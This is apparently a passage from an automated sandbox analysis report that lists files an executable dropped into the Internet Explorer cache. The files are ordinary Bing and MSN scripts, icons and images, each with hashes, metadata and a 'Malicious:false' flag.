                                                                                                                                                                                                        SHA-256:DDA145AF1F9D026E6C080B2D21FE7CA1CD46F4FB58DC1CAE1474C119B1E1FF2C
                                                                                                                                                                                                        SHA-512:0D0B40C625997D91D216DF9489D8D048047FC5179C264EEB77B8B1D28E5E11DFD633BE4B3AF07AFD96F9E0F526E5DD1BA97232AA6DE1B05A94FC60682321D151
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(t){n&&Lib.CssClass.contains(n,"b_active")&&(sj_pd(t),sj_sp(t))},!0)})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Fsa_OI0AplCnVoXGca8ALOo0S0s[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):282
                                                                                                                                                                                                        Entropy (8bit):4.768675821769942
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                                                                                                                        MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                                                                                                                        SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                                                                                                                        SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                                                                                                                        SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Nksr5XkRIuoUdxQ2qS3yL9r8V8E.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8674
                                                                                                                                                                                                        Entropy (8bit):5.212727429542033
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                                                                                                                        MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                                                                                                                        SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                                                                                                                        SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                                                                                                                        SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NnFHhz2jL6yzChtIhaB5IIVKY5k[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                        Entropy (8bit):4.61511796141903
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                                                                                                                        MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                                                                                                                        SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                                                                                                                        SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                                                                                                                        SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Y806JrL6RagU8tqNI_iN1M1S1mA.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):891
                                                                                                                                                                                                        Entropy (8bit):5.1332488883366585
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                                                                                                                        MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                                                                                                                        SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                                                                                                                        SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                                                                                                                        SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\authorize[1].htm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1194), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1194
                                                                                                                                                                                                        Entropy (8bit):5.269399823456483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:k+NmKUV5uE2bovcLABeU572HQ3EA+spFMC+s0+NaSrZcWZI1RuhHXI:n0VhmLABeS71F+spFL+s0+gSrZcWGuhY
                                                                                                                                                                                                        MD5:01441FB4665A4C9BA051235D2BB7DD15
                                                                                                                                                                                                        SHA1:7A543C1D7CEB0A1E42E6A5A45B13B33ABE0A580F
                                                                                                                                                                                                        SHA-256:3B27F779C252D4C874A0AF3E0A787C74DD436B45F436D38F4B2EDDF28A4F905C
                                                                                                                                                                                                        SHA-512:EEFC68BEE6521ADFC168E9FA1A3D5D89E8DBD06B336CF1983C1404201497EB72F39A80E3DB0062C29E756073780BDF5D91B339F2C750187F03C4941C0CF6E6F3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<html><head><title>Working...</title></head><body><form method="POST" name="hiddenform" action="https://www.bing.com/orgid/idtoken/nosignin"><input type="hidden" name="error" value="login_required" /><input type="hidden" name="error_description" value="AADSTS50058: A silent sign-in request was sent but no user is signed in. The cookies used to represent the user&#39;s session were not sent in the request to Azure AD. This can happen if the user is using Internet Explorer or Edge, and the web app sending the silent sign-in request is in different IE security zone than the Azure AD endpoint (login.microsoftonline.com). Trace ID: 8c3a58a4-70b8-415f-9225-88b8495e3500 Correlation ID: 90990ce5-d3d0-496a-9b06-d6029702537f Timestamp: 2025-01-03 14:26:05Z" /><input type="hidden" name="error_uri" value="https://login.microsoftonline.com/error?code=50058" /><input type="hidden" name="state" value="{&quot;ig&quot;:&quot;5F4B6DC1B0B44A0E8B9396C4B221B2F1&quot;}" /><noscript><p>Script is disabled. Cl

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\common.802715d7a736bd82fc74[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):265561
                                                                                                                                                                                                        Entropy (8bit):5.432386621514022
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Hw+voYPbYRFKstM4weHKyhqGF0/UnwQXXiR4U2JH5:HLvoMKkstM4wBVUnjJZ
                                                                                                                                                                                                        MD5:1C984AC84FC70C69942DF2AD7CD7933E
                                                                                                                                                                                                        SHA1:61A5C268E80AF49D161ADD6B6EE0DB6FC02EB6EA
                                                                                                                                                                                                        SHA-256:8D7E6CE8CC3594239246D481140C43546A2058B5B75DCA2048389C3713B9FE15
                                                                                                                                                                                                        SHA-512:1B19BC2DC7CDFD89A5657D0BDB9D9E63F6396994426780241E2F5F7669ECCFE4102814593A0E15170349F7340062D29AD8750B4B5DA43E63D624E3BA64F2FE98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["common"],{54085:function(e,t,n){var r;n.d(t,{p:function(){return r}}),function(e){e.Desktop="desktop",e.Phone="phone",e.Tablet="tablet"}(r||(r={}))},21290:function(e,t,n){n.d(t,{GB:function(){return s},Km:function(){return c},Oq:function(){return f},Sp:function(){return d},Wc:function(){return u},cm:function(){return p},e_:function(){return g},oH:function(){return h},r7:function(){return a},yL:function(){return l}});var r=n(45331),i=r.z.Alert,o={build:""};function a(e){Object.assign(o,e)}var s={id:22012,severity:i,pb:o},c={id:22014,severity:r.z.Critical,pb:o},u=(r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,{id:22027,severity:r.z.Critical,pb:o}),l=(r.z.Critical,r.z.Critical,{id:22031,severity:i,pb:o}),p={id:22032,severity:i,pb:o},d={id:22033,severity:i,pb:o},f={id:22034,severity:i,pb:o},h={id:22050,severity:i,pb:o},g={id:22051,severity:r.z.Deprecated,pb:o};r.z.De

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\desktop-shape[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):197
                                                                                                                                                                                                        Entropy (8bit):5.986656121330302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                                                                                                                                                                                        MD5:34760615AB0C180EB4B48739297FD0F2
                                                                                                                                                                                                        SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                                                                                                                                                                                        SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                                                                                                                                                                                        SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.............e.t.....pHYs.................sRGB.........gAMA......a....ZIDATx......@.EA.`...U..1\.......X]...G..{..HU.4Uj.`..O .3;..\..!3...q....[s./.@@..p...>.`(k..2.....IEND.B`.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\experience.b374b0d5b40196862f17[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):231602
                                                                                                                                                                                                        Entropy (8bit):5.762554862752807
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:Bl4m9Uoyafb1Hjhw3dsrWnQHdiJg7hJ5BjNnaAyGJNyWVzskeUjlWSGu9bCxKYb1:Mm9r0g9KAvyWs7Gb9+Fb1Zzae
                                                                                                                                                                                                        MD5:3ACCB914F415F2E2C36775D5783CF112
                                                                                                                                                                                                        SHA1:7CB1F2677020EAFEAF7BFCCF2E15BC7DC45DC758
                                                                                                                                                                                                        SHA-256:D3722105B5C0D92A3E85ECA10174193CD0AF84DE74586B2EEE991182CFF5AFFE
                                                                                                                                                                                                        SHA-512:3024450B40BBF7F3482F465BC831E4826543DE5D6A634584AAE7C5EA4B72D8F6E75A675D9371BF92303E051BFF94ACE431A082D8BD5E89CB664FC0DEF41DB19B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:!function(){"use strict";var t,e,n,r={12451:function(t,e,n){var r=n(8460),i=n(2132),a=n(82589),o=n(9925),s=n(96838),c=n(56595),l=n(54616),d=n(82512),u=n(3290),f=n(8488),p=n(4577),m=n(4108),g=n(23159),h=n(65212),v=n(27310),b=n(54085),x=n(29714),y=n(3460),w=n(91898),k=n(42390),C=function(){function t(){}return Object.defineProperty(t,"viewType",{get:function(){return x.Gq.get(this.viewTypeKey)},set:function(t){x.Gq.set(this.viewTypeKey,t)},enumerable:!1,configurable:!0}),t.trackCallbacks=function(){switch((0,y.Bn)().currentColumnArrangement){case w.K$.c1:case w.K$.c2:t.viewType="size2column";break;case w.K$.c3:t.viewType="size3column";break;case w.K$.c4:t.viewType="size4column"}return t.viewType},t.getTelemetryProperties=function(t,e){var n=!("false"===k.c.getQueryParameterByName("enableTrack",e)),r=k.c.getQueryParameterByName("ocid",e)||"hpmsn",i=u.jG.ActivityIdLowerCaseNoHypens,a="0",o=!1;if(d.Al&&d.Al.ClientSettings){var s=d.Al.ClientSettings;"true"===s.static_page&&(o=!0),a=s.browser

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\hjhfd1k8QFxRGOj4kh67VzVClLA.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7155
                                                                                                                                                                                                        Entropy (8bit):5.435598317550486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                                                                                                                        MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                                                                                                                        SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                                                                                                                        SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                                                                                                                        SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ie-image[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1260 x 293, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):39155
                                                                                                                                                                                                        Entropy (8bit):7.8985187905985486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:c3+SnZXFurjYW0X0RJ/Dd18i72A/qcQ6Nj2CG+CiTZ2co4IXnmDt:DSnZXFuPSX0f837cQnCG+3WZXmx
                                                                                                                                                                                                        MD5:E161E2045A32E4513E81954B1D83B953
                                                                                                                                                                                                        SHA1:0A06306203C286B8C342CFD856C1EE3F16728C7E
                                                                                                                                                                                                        SHA-256:7A344D69BC6657592E6041F0ED4F53F56ABA90B97EBD94559198B1D059DC7F64
                                                                                                                                                                                                        SHA-512:7C7E5C2D2A0DF749BB4B52F2E8042829AE8ADD4F242674E13C14FEC436E56D7B173318D8408DD5A33462D38BC1FD2AD932B2060994B5A0C46F4B4BA89922437F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.......%.....W.}^....pHYs.................sRGB.........gAMA......a.....IDATx.....diz..}.c._..W.7..Nc\..,@...]I w..")..DI+.!.6......A?2......pI`....{.........&.9...s2o...2Y5..0;.I{O..|.<.#...?. """""""".............&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ihC7RhTVhw2ULO_1rMUWydIu_rA.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1589
                                                                                                                                                                                                        Entropy (8bit):5.24528911504239
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                                                                                                                        MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                                                                                                                        SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                                                                                                                        SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                                                                                                                        SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ln5TQq6AIWfcBlduDk-5bnaJMpY[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4409
                                                                                                                                                                                                        Entropy (8bit):7.661436320849241
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                                                                                                                        MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                                                                                                                        SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                                                                                                                        SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                                                                                                                        SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\logo[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):27928
                                                                                                                                                                                                        Entropy (8bit):7.701164569435742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xSufGKAfaoovahBv4apFM4lvzDpqFosGd+Up9FIK0B:jfUMve54E//fCiIK0B
                                                                                                                                                                                                        MD5:862D29153222B9B15C3C73B61B930335
                                                                                                                                                                                                        SHA1:391BEBF4BA8910B718C5516491EB1C7D32D4C187
                                                                                                                                                                                                        SHA-256:3EC8FA41DCE2684102F4A7B2D993388809CC2F6AE0616807CA9E3D94E6D19AC2
                                                                                                                                                                                                        SHA-512:6FFCB08DE27DFA571C8EF35E7F017F2871482581308C10CF38EFF9A507D02325222B899D667FC86227C2985ACA05F17C1CD33EF4163BE3442F70F8907BD78404
                                                                                                                                                                                                        Malicious:false
